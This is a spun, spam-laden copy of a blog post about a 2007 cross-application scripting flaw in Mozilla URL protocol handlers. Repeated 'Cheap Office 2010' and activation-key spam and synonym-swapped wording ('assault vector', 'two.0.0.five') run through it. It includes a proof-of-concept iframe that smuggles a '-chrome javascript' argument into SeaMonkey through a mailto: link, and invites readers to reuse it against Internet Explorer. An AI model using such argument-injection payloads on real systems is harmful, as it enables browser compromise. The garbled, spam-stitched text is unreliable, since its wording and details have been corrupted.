103,
Cheap Office 2010,033 spam responses blocked by
Akismet
This is basically merely a quick notice to detail what other people have certainly found as well.
The Mozilla Corporation launched Firefox two.0.0.five on July 17, followed through the release of Thunderbird 2.0.0.5 on July 19. Each of those releases tightened up the input validation performed on command line arguments,
Office 2010 Professional, particularly to disallow other browsers from abusing them as assault vectors via inbound arguments.
This was achieved by specifying a further command line argument called -osint, for “operating system internal”, which was appended to any of their registered URL protocol handlers. Previously,
Microsoft Office Professional 2010, the FirefoxURL protocol handler looked similar to the following
C:\PROGRA~1\MOZILL~3\FIREFOX.EXE -requestPending -url “%1″
Whereas after Firefox 2.0.0.5 the same protocol handler was changed to
C:\PROGRA~1\MOZILL~3\FIREFOX.EXE -requestPending -osint -url “%1″
Whenever the application sees that an -osint flag has been specified it will first determine the argument name and then use the remainder of the command line as the argument value, disrupting the potential for external applications such as Internet Explorer to abuse them as attack vectors.
SeaMonkey 1.1.3 was released on July 16 but does not include this modification. As such it is still possible to perform cross application scripting on SeaMonkey from other browsers,
Office Standard 2007 Key, such as Internet Explorer, who still do not escape command line arguments to URL protocol handler applications.
Firefox could be used as an assault vector through its FirefoxURL protocol handler, but SeaMonkey has not yet included the required SeaMonkeyURL protocol which would give it Vista compatibility. It does,
Office 2010 Activation, however, register itself as the handler for protocols such as gopher: and mailto:, the latter of which we can then use as an assault vector with the following POC exploit.
<html><body>
<iframe src=’mailto:m -chrome “javascript
:alert(1)’>
</body></html>
You can also find the above demonstratory exploit at All it does is to launch SeaMonkey with the following command line arguments.
SeaMonkey.exe -compose mailto:me@nowhere.com -chrome “javascript
:alert(1)
And there you have it, Mozilla might have bailed out Microsoft once with their previous security update but they have yet to release an updated version of SeaMonkey which removes this attack vector. You can still exploit Internet Explorer simply by substituting “FirefoxURL” with “mailto” in your exploit
Office 2010 Professional Larholm.com - Me, myself
Linear Mode
